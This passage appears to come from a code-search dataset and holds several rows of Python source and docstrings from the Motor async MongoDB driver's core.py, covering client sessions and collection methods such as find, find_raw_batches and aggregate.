await collection.delete_one({'x': 1}, session=s)
await collection.insert_one({'x': 2}, session=s) | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L299-L320 | null | class AgnosticClientSession(AgnosticBase):
"""A session for ordering sequential operations.
Do not create an instance of :class:`MotorClientSession` directly; use
:meth:`MotorClient.start_session`:
.. code-block:: python3
collection = client.db.collection
async with await client.start_session() as s:
async with s.start_transaction():
await collection.delete_one({'x': 1}, session=s)
await collection.insert_one({'x': 2}, session=s)
.. versionadded:: 2.0
"""
__motor_class_name__ = 'MotorClientSession'
__delegate_class__ = ClientSession
commit_transaction = AsyncCommand()
abort_transaction = AsyncCommand()
end_session = AsyncCommand()
cluster_time = ReadOnlyProperty()
has_ended = ReadOnlyProperty()
options = ReadOnlyProperty()
operation_time = ReadOnlyProperty()
session_id = ReadOnlyProperty()
advance_cluster_time = DelegateMethod()
advance_operation_time = DelegateMethod()
def __init__(self, delegate, motor_client):
AgnosticBase.__init__(self, delegate=delegate)
self._client = motor_client
def get_io_loop(self):
return self._client.get_io_loop()
@property
def client(self):
"""The :class:`~MotorClient` this session was created from. """
return self._client
if PY35:
exec(textwrap.dedent("""
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
self.delegate.__exit__(exc_type, exc_val, exc_tb)
"""), globals(), locals())
def __enter__(self):
raise AttributeError("Use Motor sessions like 'async with await"
" client.start_session()', not 'with'")
def __exit__(self, exc_type, exc_val, exc_tb):
pass
|
mongodb/motor | motor/core.py | AgnosticCollection.find | python | def find(self, *args, **kwargs):
cursor = self.delegate.find(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticCursor, self._framework, self.__module__)
return cursor_class(cursor, self) | Create a :class:`MotorCursor`. Same parameters as for
PyMongo's :meth:`~pymongo.collection.Collection.find`.
Note that ``find`` does not require an ``await`` expression, because
``find`` merely creates a
:class:`MotorCursor` without performing any operations on the server.
``MotorCursor`` methods such as :meth:`~MotorCursor.to_list`
perform actual operations. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L556-L571 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticCollection(AgnosticBaseProperties):
__motor_class_name__ = 'MotorCollection'
__delegate_class__ = Collection
bulk_write = AsyncCommand(doc=bulk_write_doc)
count_documents = AsyncRead()
create_index = AsyncCommand()
create_indexes = AsyncCommand(doc=create_indexes_doc)
delete_many = AsyncCommand(doc=delete_many_doc)
delete_one = AsyncCommand(doc=delete_one_doc)
distinct = AsyncRead()
drop = AsyncCommand(doc=drop_doc)
drop_index = AsyncCommand()
drop_indexes = AsyncCommand()
estimated_document_count = AsyncCommand()
find_one = AsyncRead(doc=find_one_doc)
find_one_and_delete = AsyncCommand(doc=find_one_and_delete_doc)
find_one_and_replace = AsyncCommand(doc=find_one_and_replace_doc)
find_one_and_update = AsyncCommand(doc=find_one_and_update_doc)
full_name = ReadOnlyProperty()
index_information = AsyncRead(doc=index_information_doc)
inline_map_reduce = AsyncRead()
insert_many = AsyncWrite(doc=insert_many_doc)
insert_one = AsyncCommand(doc=insert_one_doc)
map_reduce = AsyncCommand(doc=mr_doc).wrap(Collection)
name = ReadOnlyProperty()
options = AsyncRead()
reindex = AsyncCommand()
rename = AsyncCommand()
replace_one = AsyncCommand(doc=replace_one_doc)
update_many = AsyncCommand(doc=update_many_doc)
update_one = AsyncCommand(doc=update_one_doc)
with_options = DelegateMethod().wrap(Collection)
_async_aggregate = AsyncRead(attr_name='aggregate')
_async_aggregate_raw_batches = AsyncRead(attr_name='aggregate_raw_batches')
_async_list_indexes = AsyncRead(attr_name='list_indexes')
def __init__(self, database, name, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
_delegate=None):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError("First argument to MotorCollection must be "
"MotorDatabase, not %r" % database)
delegate = _delegate or Collection(
database.delegate, name, codec_options=codec_options,
read_preference=read_preference, write_concern=write_concern,
read_concern=read_concern)
super(self.__class__, self).__init__(delegate)
self.database = database
def __getattr__(self, name):
# Dotted collection name, like "foo.bar".
if name.startswith('_'):
full_name = "%s.%s" % (self.name, name)
raise AttributeError(
"%s has no attribute %r. To access the %s"
" collection, use database['%s']." % (
self.__class__.__name__, name, full_name, full_name))
return self[name]
def __getitem__(self, name):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
return collection_class(self.database, self.name + '.' + name,
_delegate=self.delegate[name])
def __call__(self, *args, **kwargs):
raise TypeError(
"MotorCollection object is not callable. If you meant to "
"call the '%s' method on a MotorCollection object it is "
"failing because no such method exists." %
self.delegate.name)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.find_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``find_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor = self.delegate.find_raw_batches(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticRawBatchCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def aggregate(self, pipeline, **kwargs):
"""Execute an aggregation pipeline on this collection.
The aggregation can be run on a secondary if the client is connected
to a replica set and its ``read_preference`` is not :attr:`PRIMARY`.
:Parameters:
- `pipeline`: a single command or list of aggregation commands
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
- `**kwargs`: send arbitrary parameters to the aggregate command
Returns a :class:`MotorCommandCursor` that can be iterated like a
cursor from :meth:`find`::
pipeline = [{'$project': {'name': {'$toUpper': '$name'}}}]
cursor = collection.aggregate(pipeline)
while (yield cursor.fetch_next):
doc = cursor.next_object()
print(doc)
In Python 3.5 and newer, aggregation cursors can be iterated elegantly
in native coroutines with `async for`::
async def f():
async for doc in collection.aggregate(pipeline):
print(doc)
:class:`MotorCommandCursor` does not allow the ``explain`` option. To
explain MongoDB's query plan for the aggregation, use
:meth:`MotorDatabase.command`::
async def f():
plan = await db.command(
'aggregate', 'COLLECTION-NAME',
pipeline=[{'$project': {'x': 1}}],
explain=True)
print(plan)
.. versionchanged:: 1.0
:meth:`aggregate` now **always** returns a cursor.
.. versionchanged:: 0.5
:meth:`aggregate` now returns a cursor by default,
and the cursor is returned immediately without a ``yield``.
See :ref:`aggregation changes in Motor 0.5 <aggregate_changes_0_5>`.
.. versionchanged:: 0.2
Added cursor support.
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate, pipeline,
**unwrap_kwargs_session(kwargs))
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.aggregate_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``aggregate_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate_raw_batches, pipeline,
**unwrap_kwargs_session(kwargs))
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on this collection. Introduced in MongoDB 3.6.
A change stream continues waiting indefinitely for matching change
events. Code like the following allows a program to cancel the change
stream and exit.
.. code-block:: python3
change_stream = None
async def watch_collection():
global change_stream
# Using the change stream in an "async with" block
# ensures it is canceled promptly if your code breaks
# from the loop or throws an exception.
async with db.collection.watch() as change_stream:
async for change in stream:
print(change)
# Tornado
from tornado.ioloop import IOLoop
def main():
loop = IOLoop.current()
# Start watching collection for changes.
loop.add_callback(watch_collection)
try:
loop.start()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# asyncio
from asyncio import get_event_loop
def main():
loop = get_event_loop()
task = loop.create_task(watch_collection)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# Prevent "Task was destroyed but it is pending!"
loop.run_until_complete(task)
The :class:`~MotorChangeStream` async iterable blocks
until the next change document is returned or an error is raised. If
the :meth:`~MotorChangeStream.next` method encounters
a network error when retrieving a batch from the server, it will
automatically attempt to recreate the cursor such that no change
events are missed. Any error encountered during the resume attempt
indicates there may be an outage and will be raised.
.. code-block:: python3
try:
pipeline = [{'$match': {'operationType': 'insert'}}]
async with db.collection.watch(pipeline) as stream:
async for change in stream:
print(change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
See the :ref:`tornado_change_stream_example`.
.. versionadded:: 1.2
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams.rst
"""
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection. ::
async def print_indexes():
async for index in db.test.list_indexes():
print(index)
If the only index is the default index on ``_id``, this might print::
SON([('v', 1), ('key', SON([('_id', 1)])), ('name', '_id_'), ('ns', 'test.test')])
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_list_indexes, session=session)
def wrap(self, obj):
if obj.__class__ is Collection:
# Replace pymongo.collection.Collection with MotorCollection.
return self.__class__(self.database, obj.name, _delegate=obj)
elif obj.__class__ is Cursor:
return AgnosticCursor(obj, self)
elif obj.__class__ is CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ is ChangeStream:
change_stream_class = create_class_with_framework(
AgnosticChangeStream,
self._framework,
self.__module__)
return change_stream_class(obj, self)
else:
return obj
def get_io_loop(self):
return self.database.get_io_loop()
|
mongodb/motor | motor/core.py | AgnosticCollection.find_raw_batches | python | def find_raw_batches(self, *args, **kwargs):
cursor = self.delegate.find_raw_batches(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticRawBatchCursor, self._framework, self.__module__)
return cursor_class(cursor, self) | Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.find_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``find_raw_batches`` does not support sessions.
.. versionadded:: 2.0 | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L573-L599 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticCollection(AgnosticBaseProperties):
__motor_class_name__ = 'MotorCollection'
__delegate_class__ = Collection
bulk_write = AsyncCommand(doc=bulk_write_doc)
count_documents = AsyncRead()
create_index = AsyncCommand()
create_indexes = AsyncCommand(doc=create_indexes_doc)
delete_many = AsyncCommand(doc=delete_many_doc)
delete_one = AsyncCommand(doc=delete_one_doc)
distinct = AsyncRead()
drop = AsyncCommand(doc=drop_doc)
drop_index = AsyncCommand()
drop_indexes = AsyncCommand()
estimated_document_count = AsyncCommand()
find_one = AsyncRead(doc=find_one_doc)
find_one_and_delete = AsyncCommand(doc=find_one_and_delete_doc)
find_one_and_replace = AsyncCommand(doc=find_one_and_replace_doc)
find_one_and_update = AsyncCommand(doc=find_one_and_update_doc)
full_name = ReadOnlyProperty()
index_information = AsyncRead(doc=index_information_doc)
inline_map_reduce = AsyncRead()
insert_many = AsyncWrite(doc=insert_many_doc)
insert_one = AsyncCommand(doc=insert_one_doc)
map_reduce = AsyncCommand(doc=mr_doc).wrap(Collection)
name = ReadOnlyProperty()
options = AsyncRead()
reindex = AsyncCommand()
rename = AsyncCommand()
replace_one = AsyncCommand(doc=replace_one_doc)
update_many = AsyncCommand(doc=update_many_doc)
update_one = AsyncCommand(doc=update_one_doc)
with_options = DelegateMethod().wrap(Collection)
_async_aggregate = AsyncRead(attr_name='aggregate')
_async_aggregate_raw_batches = AsyncRead(attr_name='aggregate_raw_batches')
_async_list_indexes = AsyncRead(attr_name='list_indexes')
def __init__(self, database, name, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
_delegate=None):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError("First argument to MotorCollection must be "
"MotorDatabase, not %r" % database)
delegate = _delegate or Collection(
database.delegate, name, codec_options=codec_options,
read_preference=read_preference, write_concern=write_concern,
read_concern=read_concern)
super(self.__class__, self).__init__(delegate)
self.database = database
def __getattr__(self, name):
# Dotted collection name, like "foo.bar".
if name.startswith('_'):
full_name = "%s.%s" % (self.name, name)
raise AttributeError(
"%s has no attribute %r. To access the %s"
" collection, use database['%s']." % (
self.__class__.__name__, name, full_name, full_name))
return self[name]
def __getitem__(self, name):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
return collection_class(self.database, self.name + '.' + name,
_delegate=self.delegate[name])
def __call__(self, *args, **kwargs):
raise TypeError(
"MotorCollection object is not callable. If you meant to "
"call the '%s' method on a MotorCollection object it is "
"failing because no such method exists." %
self.delegate.name)
def find(self, *args, **kwargs):
"""Create a :class:`MotorCursor`. Same parameters as for
PyMongo's :meth:`~pymongo.collection.Collection.find`.
Note that ``find`` does not require an ``await`` expression, because
``find`` merely creates a
:class:`MotorCursor` without performing any operations on the server.
``MotorCursor`` methods such as :meth:`~MotorCursor.to_list`
perform actual operations.
"""
cursor = self.delegate.find(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def aggregate(self, pipeline, **kwargs):
"""Execute an aggregation pipeline on this collection.
The aggregation can be run on a secondary if the client is connected
to a replica set and its ``read_preference`` is not :attr:`PRIMARY`.
:Parameters:
- `pipeline`: a single command or list of aggregation commands
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
- `**kwargs`: send arbitrary parameters to the aggregate command
Returns a :class:`MotorCommandCursor` that can be iterated like a
cursor from :meth:`find`::
pipeline = [{'$project': {'name': {'$toUpper': '$name'}}}]
cursor = collection.aggregate(pipeline)
while (yield cursor.fetch_next):
doc = cursor.next_object()
print(doc)
In Python 3.5 and newer, aggregation cursors can be iterated elegantly
in native coroutines with `async for`::
async def f():
async for doc in collection.aggregate(pipeline):
print(doc)
:class:`MotorCommandCursor` does not allow the ``explain`` option. To
explain MongoDB's query plan for the aggregation, use
:meth:`MotorDatabase.command`::
async def f():
plan = await db.command(
'aggregate', 'COLLECTION-NAME',
pipeline=[{'$project': {'x': 1}}],
explain=True)
print(plan)
.. versionchanged:: 1.0
:meth:`aggregate` now **always** returns a cursor.
.. versionchanged:: 0.5
:meth:`aggregate` now returns a cursor by default,
and the cursor is returned immediately without a ``yield``.
See :ref:`aggregation changes in Motor 0.5 <aggregate_changes_0_5>`.
.. versionchanged:: 0.2
Added cursor support.
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate, pipeline,
**unwrap_kwargs_session(kwargs))
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.aggregate_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``aggregate_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate_raw_batches, pipeline,
**unwrap_kwargs_session(kwargs))
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on this collection. Introduced in MongoDB 3.6.
A change stream continues waiting indefinitely for matching change
events. Code like the following allows a program to cancel the change
stream and exit.
.. code-block:: python3
change_stream = None
async def watch_collection():
global change_stream
# Using the change stream in an "async with" block
# ensures it is canceled promptly if your code breaks
# from the loop or throws an exception.
async with db.collection.watch() as change_stream:
async for change in stream:
print(change)
# Tornado
from tornado.ioloop import IOLoop
def main():
loop = IOLoop.current()
# Start watching collection for changes.
loop.add_callback(watch_collection)
try:
loop.start()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# asyncio
from asyncio import get_event_loop
def main():
loop = get_event_loop()
task = loop.create_task(watch_collection)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# Prevent "Task was destroyed but it is pending!"
loop.run_until_complete(task)
The :class:`~MotorChangeStream` async iterable blocks
until the next change document is returned or an error is raised. If
the :meth:`~MotorChangeStream.next` method encounters
a network error when retrieving a batch from the server, it will
automatically attempt to recreate the cursor such that no change
events are missed. Any error encountered during the resume attempt
indicates there may be an outage and will be raised.
.. code-block:: python3
try:
pipeline = [{'$match': {'operationType': 'insert'}}]
async with db.collection.watch(pipeline) as stream:
async for change in stream:
print(change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
See the :ref:`tornado_change_stream_example`.
.. versionadded:: 1.2
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams.rst
"""
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection. ::
async def print_indexes():
async for index in db.test.list_indexes():
print(index)
If the only index is the default index on ``_id``, this might print::
SON([('v', 1), ('key', SON([('_id', 1)])), ('name', '_id_'), ('ns', 'test.test')])
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_list_indexes, session=session)
def wrap(self, obj):
if obj.__class__ is Collection:
# Replace pymongo.collection.Collection with MotorCollection.
return self.__class__(self.database, obj.name, _delegate=obj)
elif obj.__class__ is Cursor:
return AgnosticCursor(obj, self)
elif obj.__class__ is CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ is ChangeStream:
change_stream_class = create_class_with_framework(
AgnosticChangeStream,
self._framework,
self.__module__)
return change_stream_class(obj, self)
else:
return obj
def get_io_loop(self):
return self.database.get_io_loop()
|
mongodb/motor | motor/core.py | AgnosticCollection.aggregate | python | def aggregate(self, pipeline, **kwargs):
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate, pipeline,
**unwrap_kwargs_session(kwargs)) | Execute an aggregation pipeline on this collection.
The aggregation can be run on a secondary if the client is connected
to a replica set and its ``read_preference`` is not :attr:`PRIMARY`.
:Parameters:
- `pipeline`: a single command or list of aggregation commands
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
- `**kwargs`: send arbitrary parameters to the aggregate command
Returns a :class:`MotorCommandCursor` that can be iterated like a
cursor from :meth:`find`::
pipeline = [{'$project': {'name': {'$toUpper': '$name'}}}]
cursor = collection.aggregate(pipeline)
while (yield cursor.fetch_next):
doc = cursor.next_object()
print(doc)
In Python 3.5 and newer, aggregation cursors can be iterated elegantly
in native coroutines with `async for`::
async def f():
async for doc in collection.aggregate(pipeline):
print(doc)
:class:`MotorCommandCursor` does not allow the ``explain`` option. To
explain MongoDB's query plan for the aggregation, use
:meth:`MotorDatabase.command`::
async def f():
plan = await db.command(
'aggregate', 'COLLECTION-NAME',
pipeline=[{'$project': {'x': 1}}],
explain=True)
print(plan)
.. versionchanged:: 1.0
:meth:`aggregate` now **always** returns a cursor.
.. versionchanged:: 0.5
:meth:`aggregate` now returns a cursor by default,
and the cursor is returned immediately without a ``yield``.
See :ref:`aggregation changes in Motor 0.5 <aggregate_changes_0_5>`.
.. versionchanged:: 0.2
Added cursor support.
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L601-L662 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticCollection(AgnosticBaseProperties):
__motor_class_name__ = 'MotorCollection'
__delegate_class__ = Collection
bulk_write = AsyncCommand(doc=bulk_write_doc)
count_documents = AsyncRead()
create_index = AsyncCommand()
create_indexes = AsyncCommand(doc=create_indexes_doc)
delete_many = AsyncCommand(doc=delete_many_doc)
delete_one = AsyncCommand(doc=delete_one_doc)
distinct = AsyncRead()
drop = AsyncCommand(doc=drop_doc)
drop_index = AsyncCommand()
drop_indexes = AsyncCommand()
estimated_document_count = AsyncCommand()
find_one = AsyncRead(doc=find_one_doc)
find_one_and_delete = AsyncCommand(doc=find_one_and_delete_doc)
find_one_and_replace = AsyncCommand(doc=find_one_and_replace_doc)
find_one_and_update = AsyncCommand(doc=find_one_and_update_doc)
full_name = ReadOnlyProperty()
index_information = AsyncRead(doc=index_information_doc)
inline_map_reduce = AsyncRead()
insert_many = AsyncWrite(doc=insert_many_doc)
insert_one = AsyncCommand(doc=insert_one_doc)
map_reduce = AsyncCommand(doc=mr_doc).wrap(Collection)
name = ReadOnlyProperty()
options = AsyncRead()
reindex = AsyncCommand()
rename = AsyncCommand()
replace_one = AsyncCommand(doc=replace_one_doc)
update_many = AsyncCommand(doc=update_many_doc)
update_one = AsyncCommand(doc=update_one_doc)
with_options = DelegateMethod().wrap(Collection)
_async_aggregate = AsyncRead(attr_name='aggregate')
_async_aggregate_raw_batches = AsyncRead(attr_name='aggregate_raw_batches')
_async_list_indexes = AsyncRead(attr_name='list_indexes')
def __init__(self, database, name, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
_delegate=None):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError("First argument to MotorCollection must be "
"MotorDatabase, not %r" % database)
delegate = _delegate or Collection(
database.delegate, name, codec_options=codec_options,
read_preference=read_preference, write_concern=write_concern,
read_concern=read_concern)
super(self.__class__, self).__init__(delegate)
self.database = database
def __getattr__(self, name):
# Dotted collection name, like "foo.bar".
if name.startswith('_'):
full_name = "%s.%s" % (self.name, name)
raise AttributeError(
"%s has no attribute %r. To access the %s"
" collection, use database['%s']." % (
self.__class__.__name__, name, full_name, full_name))
return self[name]
def __getitem__(self, name):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
return collection_class(self.database, self.name + '.' + name,
_delegate=self.delegate[name])
def __call__(self, *args, **kwargs):
raise TypeError(
"MotorCollection object is not callable. If you meant to "
"call the '%s' method on a MotorCollection object it is "
"failing because no such method exists." %
self.delegate.name)
def find(self, *args, **kwargs):
"""Create a :class:`MotorCursor`. Same parameters as for
PyMongo's :meth:`~pymongo.collection.Collection.find`.
Note that ``find`` does not require an ``await`` expression, because
``find`` merely creates a
:class:`MotorCursor` without performing any operations on the server.
``MotorCursor`` methods such as :meth:`~MotorCursor.to_list`
perform actual operations.
"""
cursor = self.delegate.find(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.find_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``find_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor = self.delegate.find_raw_batches(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticRawBatchCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.aggregate_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``aggregate_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate_raw_batches, pipeline,
**unwrap_kwargs_session(kwargs))
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on this collection. Introduced in MongoDB 3.6.
A change stream continues waiting indefinitely for matching change
events. Code like the following allows a program to cancel the change
stream and exit.
.. code-block:: python3
change_stream = None
async def watch_collection():
global change_stream
# Using the change stream in an "async with" block
# ensures it is canceled promptly if your code breaks
# from the loop or throws an exception.
async with db.collection.watch() as change_stream:
async for change in stream:
print(change)
# Tornado
from tornado.ioloop import IOLoop
def main():
loop = IOLoop.current()
# Start watching collection for changes.
loop.add_callback(watch_collection)
try:
loop.start()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# asyncio
from asyncio import get_event_loop
def main():
loop = get_event_loop()
task = loop.create_task(watch_collection)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
